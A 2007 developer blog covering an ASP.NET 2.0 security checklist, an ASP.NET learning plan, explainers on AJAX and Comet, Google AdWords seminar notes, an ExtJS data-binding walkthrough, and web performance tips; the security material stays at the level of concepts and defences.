Tuesday, December 11, 2007
(Links Updated On 29th December 2007)
Monday, December 10, 2007
Security is one of the critical components in the engineering of any web application but unfortunately it isn’t handled in an equally critical way. With an ever increasing popularity of providing access to information over the web at a mouse-click, security concerns are increasing with a similar pace.
Below I have jolted down the list of some of the major security related items (you can call them ASP.NET security best practices, security checklist or the tips and tricks for engineering secure web applications in ASP.NET) which one must keep in mind, while engineering an ASP.NET Web application in which “SECURITY IS A CONCERN”.
My approach is not to provide you the complete end to end solution to each of the concern, but to highlight and provide pointers to the different approaches to cater each of these security items in the check list.
- You can use the built-in authentication mechanisms (Forms, Windows and Passport) or Custom Authentication (Session Based; storing some user specific value in user’s session at the time of authentication so as to validate the user for subsequent requests by the same user, Using Hidden Fields; the traditional way but un secure way of maintaining authenticated user information etc).
- You can use the built-in login controls provided in ASP.NET 2.0. Additionally in order to have a granular control over the User Authentication process refer to the Membership and Role Management API. In case you want the Login Controls / Management API to work with your custom database, you can write your own Membership and Role Provider.
Encrypt sections of the configuration file having confidential information
- Whenever you need to put any confidential information in the configuration file like the database user name / password, don’t leave that information in plain text in the configuration file, rather encrypt it using the built-in “aspnet_regiis” utility with the command line option “-pe”. The aspnet_regiis.exe is located at
- Once a section of the web.config file is encrypted then contents of that section aren’t human readable whenever that file is opened in some text editor, however when you access the configuration information through ASP.NET (the .NET 2.0 framework) it knows how to decrypt the contents and provide actual contents to the application.
- You can use the Management API in order to programmatically encrypt the sections of your Web.Config file. The Management API added in ASP.NET 2.0 is very rich and provides you access to the complete configuration of the application and ability to modify the configuration file on the fly.
One-way encrypt the user passwords before storing in database
- Later on when the user wants to log in, encrypt the user entered password using the same encryption algorithm and then match it with the password in the database.
- In case the user has forgotten his password, provide user an interface to set a new password after performing necessary validations. You can send a link to set new password for that user at his email address.
Use database user having limited rights
- Create a user in the database that has limited rights (INSERT, UPDATE, SELECT and may be DELETE from specific tables) only those tables of the database that needs to be accessed by your web application, and use that user to access the database from within your application.
Show custom error pages with user friendly error messages
- Never show the built in error page, telling the complete error detail for debugging the error to your end user. That discloses a lot of information that’s not intended for an end user.
- You should better show custom error pages to the user with user friendly error messages while Logging the actual error occurred for the application developers to re-produce / debug and eventually resolve that error.
- Always handle any of the unhandled exception in the Application_OnError event, use the Server.GetLastError() to get the detailed information about the error that occurred, while showing the user a custom error page and logging the actual error.
Check the Request’s Referrer Property
- Check that the request has actually originated from your own website (from an intended page). Not checking so can lead to un precedent attacks
Handle SQL Injection Attacks
- If you are using stored procedures, then you will be using SQL Parameters to send the user input to it and get the results. In that case your application isn’t prone to SQL Injections. However using the Stored Procudures or not in your web application is another debate, lets not get into that and focus on handling SQL Injections.
- The problem comes when you are using inline queries and concatenates the user input with in the SQL Query. A well tailored user input by a hacker can break your security checks as well as can possibly drop the tables in your database etc. by using the single quotes and comment signs with in the user input. So concatenating the user input’s as is in inline SQL Queries can be fatal for your web application.
- Use SQL Parameters even with “inline queries”, they automatically cater for the SQL Injection attacks.
Handle Cross Site Scripting Attacks
- ASP.NET default behavior doesn’t allow the user to enter tags “
” and shows an error page if such input is entered in a form field.
- Some application may need to allow the user to enter information in tags, but this will result in potential security leaks, that’ named Cross Site Scripting. A user can write the <script&rt; tag, which can be possibly rendered to another user browsing the site. That script tag will be executed in the context of that second user, and that intelligently tailored script tag can possibly access the second user cookies etc and moreover can possibly submit a malicious request with the second user credentials using XML Http Request / AJAX etc.
- Use the Microsoft’s AntiXSS Library to handle cross site scripting attacks.
Handle Dictionary Attacks – Captcha
- Hackers can attack your website authentication system and submit automated login requests to crack the passwords of authenticated users of your protected website. You should check that your Login form / Authentication system isn’t attacked by this, by ensuring that it’s accessed by humans (asking the user to enter the characters shown on a bit distorted but human readable image). For more information on Dictionary Attacks point to Wikipedia
Denial of Service Attacks
- The last resort for any hacker of your website is the denial of service attacks. You should track the activity for each of the user and should limit the repeated requests sent by the same IP to a decent number.
- You can use the ASP.NET AJAX Control Toolkit – No Robot Control to help you out in this, but it should be used with caution as stated on the above website.
Log user activity
- This way you don’t only capture some very useful data about the user trends but this data can also help you detect any un-desired activity made by the user.
- You can use the Enterprise Library Logging Application Block log the user activity. Microsoft Enterprise Library’s Logging Application Block has the feature to log in the database, so that you can later on query it and create reports on it to find not only any interesting patterns based on “User Pathology” but can also point out any un-desired user activity.
I hope this pretty much covers most of the security check list items. However, I will be adding more and more to it, to provide a to-date comprehensive guide for engineering secure web apps in ASP.NET 2.0
So, I decided to share “My Proposed Strategy of Learning ASP.NET 2.0” over here for people to look at and get started. Although the points listed below don’t apply to every one, and that varies, depending on a person’s level of exposure in engineering web applications.
My strategy is to start from the basics and finally conclude by providing pointers to resources for engineering more sophisticated applications in ASP.NET 2.0.
Know how of Client-Server Interaction in Web Apps
Once you are done with the basics, you should have an idea of the interaction of the Client (web browser) and the web server (IIS etc) in any web based application.
The client sends a request to the server, server processes that request and finally sends the response back to the client. So, it’s a “request/response” based interaction between the web client and the web server.
Moreover this interaction between the client and the server is stateless. Cookies are used to maintain state at the client as well as the server between the successive requests made by a single client (wherever management of user state, between successive requests is required).
Know how of Implicit Objects in any Server Side Scripting Language
After that, a person should have an idea of what a server side scripting language is and the implicit objects available in that as well as the capability / role of each of those implicit objects. Those implicit objects include Request, Response, Server, Application and Session.
Once you are done with this much background knowledge, you should have the right development tools / IDE as well as the .NET 2.0 Framework (also comes packaged with IDE) installed on your machine. If you have Visual Studio 2005 available with you, that’s well and good as it will install the Framework, the IDE as well as the SQL Server 2005 Express through a single install package. Otherwise you can download and install the “Free Version” in the name of Visual Web Developer 2005 Express Edition (IDE for ASP.NET 2.0, contains the.NET Framework 2.0) and the SQL Server 2005 Express Edition (Backend Database Server). You can download them from for free from the Microsoft Website i.e. http://www.microsoft.com/express/2005/download/default.aspx
ASP.NET 2.0 Beginners / How Do I Video Tutorials
A picture is worth a thousand words and a guided video have a much more impact. So I recommend people to view web casts on ASP.NET 2.0 and related topics to have a better and quicker insight of it. The official ASP.NET website provides a very good pool of video tutorials on ASP.NET 2.0 which I strongly recommend people to download, watch and eventually apply. You can point to http://www.asp.net/learn/videos/#beginners for those video tutorials.
ASP.NET 2.0 Quickstart Samples
By now you must have been able to develop a good enough small sized web application in ASP.NET 2.0. However you still are in need to some samples / code examples and a quick description of each of the feature of ASP.NET 2.0. Here, the excellently tailored ASP.NET 2.0 Quickstarts serves the purpose. You can point to the official ASP.NET website http://quickstarts.asp.net/ for an online version of these code examples and related descriptions of each of the features of ASP.NET 2.0. The code samples in these Quickstarts are available both in C# and VB.NET depending on user preference.
Microsoft Patterns & Practices: Enterprise Library
People at Microsoft Patterns & Practices are working quite devotedly to provide you with Libraries and APIs needed for the development of your applications in .NET Framework. You can leverage from their very first initiative the Enterprise Library, which has evolved over the period of time and is much mature now. You can get the latest version 3.1 of it, which works with the .NET Framework 2.0 / 3.0 / 3.5 from http://www.codeplex.com/entlib
Microsoft Patterns & Practices: Software Factories
Still need some more pointers to engineer a more sophisticated web applications? Look for the Software Factories; another great initiative of Microsoft Patterns and Practices Team. Refer to the Web Client Software Factory on CodePlex for more details.
The Data Access Application Block, Logging Application and Caching Application Block of the Enterprise Library are the ones which one must try. I can guarantee that you will find them really helpful in engineering your applications without bothering much about these common functionalities.
I also strongly recommend all those who want to have quick hands on, on ASP.NET 2.0 to locally install quick-starts on their own development machines (available under the Microsoft .NET Framework 2.0 SDK in Visual Studio 2005 installer), and go through the topics and code samples whenever you are free. This will really help you in getting a broader idea of the capabilities of ASP.NET 2.0.
Wednesday, November 28, 2007
Here I will try to explain “What Comet actually Is?” So, let’s start with the basics. HTTP protocol is based on the pull model i.e. the client sends a request to the server, the server processes that request and sends the response back to the client. This conventional way leads to serious bandwidth + network traffic + scalability issues for web applications that need to provide some real time information i.e. news ticker or stock quotes or a web based chat client kind of things over the web. Considering this pull model of HTTP, the web application simulates the real time updates of the news / stock quotes ticker by periodically sending AJAX requests using some Java Script timers or a similar approach. So in that case my application is generating periodic XMLHttp Requests irrespective of the fact whether there are any updates on the server or not, this leads to a substantial over head in terms of the network bandwidth, web server’s scalability and performance. This way of simulating the real time updates is call the Ping Model, in which you are continuously ping-ing the server to get any of the updated contents available on the server.
What if I don’t want to Ping the server for updates? What if I want the web server itself to notify the client whenever there is an update? Can we really do that? Is it possible over HTTP? Is it possible in ASP.NET + IIS? These are the questions which must be storming your mind by now.
What I can say about all this is that, there are several giants who are into it, like Google is achieving this task some how on it’s Google Talk web chat panel inside GMail web based interface. Meebo is also providing that server push kind of thing for its web chat platform. There are also several (experimental + commercial) implementations of Comet which are available out there.
Still I have serious doubts about the scalability any such solution. What we know is that HTTP is based on the pull model, then how can these implementations achieve a real server push over HTTP? What as per my feeling, they are doing is simulating the server push using Long-Lived-Http-Requests or the other option to achieve Server Push is to bypass HTTP and use the Raw TCP sockets, but that would lead many other concerns related with security, scalability etc.
Another way to achieve this server push on Web is using Sockets in Flash movies, these flash movies can be easily embedded in web pages that can be shown over HTTP, but in that case we need a Flash Communication Server. Thus even for that, there is some thing that’s required from the server to achieve this push kind of behavior in web applications to provide real time information on web pages.
So far, Microsoft is quite on this. Let’s see how things turn out from there end.
Below are a few links to the related articles and working samples to increase your urge to learn more and more about Comet.
Monday, November 26, 2007
If you have any of the below questions in your mind, then I would recommend you to continue reading this post.
- Is it a tool?
- Is it a language?
- Is it a technology?
- Is it a library?
- Is it a technique?
- What’s so special about AJAX?
- What’s working behind the scenes in AJAX?
- Can’t we do the same trick if we don’t have the XMLHttpRequest object available in browsers?
- Can’t we make an AJAX request synchronous?
- How comes AJAX improve the responsiveness of a Web Application?
- Is the round-trip eliminated in case of AJAX?
- When to use AJAX?
Here are the points one needs to remember about AJAX, so as to have a clear understanding of what it actually is, what’s working behind the scenes, what are it’s alternates, when to use it and when not to use it.
- “AJAX is a technique” to make web applications more responsive, by enabling the application developers to “seamlessly make a request to the server without the need to Post Back the complete page” in order to provider better user experience.
- The core object that’s working behind the scenes to seamlessly make a request to the server and is available in all modern browsers is “XMLHttpRequest / Microsoft.XMLHTTP”.
- There are “many libraries/frameworks written on top of this XMLHttpRequest / Microsoft.XMLHTTP” object that facilitate the AJAX based development. ASP.NET AJAX is one of those 100s of frameworks available for free to the ASP.NET developers to incorporate AJAX features in their ASP.NET based web applications.
- “We can make a synchronous requests” with XMLHttpRequest too.
- AJAX “doesn’t eliminate the round-trip to the server”; it’s not like that all the data required by the page is sent to the client side when the page is first rendered, using such approach (might) result in performance hit (in most cases). It’s actually an “on-demand fetching of the required data based on user actions / timers in a seamless fashion to provide a better user experience”.
- “Use AJAX in order to improve the user experience”. Keep the end use of your web application in mind, while you are engineering the application. This is the real key to make a successful web product / application.
- “Use AJAX in order to minimize the overall network traffic” created by your web application.
- “Don’t use AJAX to the extent that makes the response of your web application un-predictable for an end user”.
I will be providing a quick review of ASP.NET AJAX and its Programming Models in a week or so, keep your fingers crossed.
A couple of weeks back, I attended a seminar on “Secrets of Internet Marketing with Google” at my university; LUMS.
The session started with case studies on Google’s AdWords, presented by CEOs / Technical Consultants of
After that Badar Khushnood; Country Consultant of Google Pakistan at Google Inc., presented an enlightening and quite a convincing presentation on the said topic.
I knew from quite some time that Google shows relevant Sponsored Text Ads with search results but I never knew that even a person like me can design a marketing campaign, at an affordable cost, using Google AdWords.
I heard quite a few surprising facts of internet marketing with Google at the seminar and would like to share some of those with you so that you can use it too to increase the market share of your products / services.
- “ShopHive” a Pakistani Shopping portal with monthly revenue of around 5 Million Rs is using Google AdWords and have a bigger competitive edge on “MyShop” because of the targeted audience.
- “CottonSocks” is reaching its targeted audience for exports by using Google AdWords and is happy with the overall cost / benefit ratio; same is the case with “LumeSoft”.
- Google “doesn’t charge you just for displaying your Ads” in the sponsored Ads panel in its search results. You will be only charged when any user browsing the search results actually clicks on your Ad.
- There is a “cost associated with per user click (CPC)” on your Ad and that depends on word you have chosen against which your Ad will be shown to the user who searches on that word or any of the related word.
- You can reach your “Targeted Audience” with Google AdWords. You can design your marketing campaign such that your Ads will be displayed only to those users browsing the web from a particular geographical area e.g. you can limit that your Ads should be displayed to only those users who are browsing the search results from Lahore only.
- You can tailor “any number of Ads” to be displayed in the sponsored links panel of Google Search Results.
- You can display your Ad as the sponsored links on the Google Search Results page with daily expenditure of as low as 1$ i.e. 60 Rs only, which is far low as compared to any other medium of advertising and is much more effective. In essence you can “define you daily budget for the Ads” to be displayed.
- Google also offers “certifications in Google AdWords” which one can opt for as a consultant to attract more and more companies to get consultation from him/her.
Sunday, November 25, 2007
Although the use of Update Panel can do the wonders to make a traditional ASP.NET Application a bit more responsive but I have always been eager to make the application responsive with minimal network traffic and that’s not the case when we use the ASP.NET AJAX Update Panel.
A quick walkthrough on how to bind the data returned from server to an ExtJS based Grid is outlined below.
- Get the data from the server (like getting a list of Employee type of objects i.e. List
) using the ASP.NET AJAX Page Methods.
- Define the ExtJS based “Record” that maps the Employee type of C# Class objects to an ExtJS based employee “Record” type.
- Define the ExtJS based “JsonReader” and associate that reader with the employee “Record” type you have just defined in Ext JS.
- Define the ExtJS based “Store” and load the returned List
in that store using the reader you have already defined.
- Now you can bind this ExtJS based “Store” to any ExtJS based “GridPanel” or Select list or can use the store as a temporary data place holder for further manipulation later on.
The tricky part is to read the returned List of Employees in “JsonReader” and load it in “Store”, once the data is loaded in the Store, you can bind it to any data bound ExtJS control or can manipulate it later on.
On request of one of the readers; Imtiaz, here is the sample code of the above walkthough. [Added: 14/12/2007]
ExtJS is compatible with all the modern browsers, and can be used for free under open source license or under a commercial copy-left license. For more details on licensing, refer to the ExtJS website. i.e. http://www.extjs.com/
A few sample UIs (snapshots of ExtJS examples) made with the ExtJS UI Framework are shown below to give you an idea of what we can get out of ExtJS.
Saturday, November 24, 2007
Along with my other plans on how to spend these holidays, like spending some healthy time with my parents, I plan to update my blog with my experiences so far; old + new including but not limited to stuff like Comet, AJAX+ASP.NET AJAX 1.0, FxCop, Firebug + YSlow, SandCastle, MVC Framework for ASP.NET, C#3.0/3.5, Web Client Software Factory, Provider Model, Google AdWords etc. Let’s see how much successful I am in sharing some really exciting information on the said topics I have learnt through my experience working in these.
Monday, November 05, 2007
.NET 3.0 adds four frameworks namely Windows Communication Foundation (WCF), Windows Workflow Foundation (WF), Windows Presentation Foundation (WPF) and Card Space to .NET 2.0 and Microsoft named the resulting framework as .NET 3.0 (a marketing tactic).
Similarly .NET 3.5 adds Language Integrated Query (LINQ), Representational State Transfer (REST) and AJAX functionality to .NET 3.0 and named the resulting framework as .NET 3.5.
Thursday, September 13, 2007
Steve Souders has jolted down fourteen simple tips and tricks to improve website performance.
- Make fewer HTTP requests
- Use a CDN
- Add an Expires header
- Gzip components
- Put CSS at the top
- Move JS to the bottom
- Avoid CSS expressions
- Make JS and CSS external
- Reduce DNS lookups
- Minify JS
- Avoid redirects
- Remove duplicate scripts
- Turn off ETags
- Make AJAX cacheable and small
You can download his complete presentation on the said topic at Web 2.0 Expo conference from here
Wednesday, September 12, 2007
That’s a really good sign that people understand the complexities of such client centric approaches to web development and have started finding way outs to abstract and better organize them through such server side frameworks while maintaining their inherent user experience.
For the actual UI Library by Yahoo refer to http://developer.yahoo.com/yui/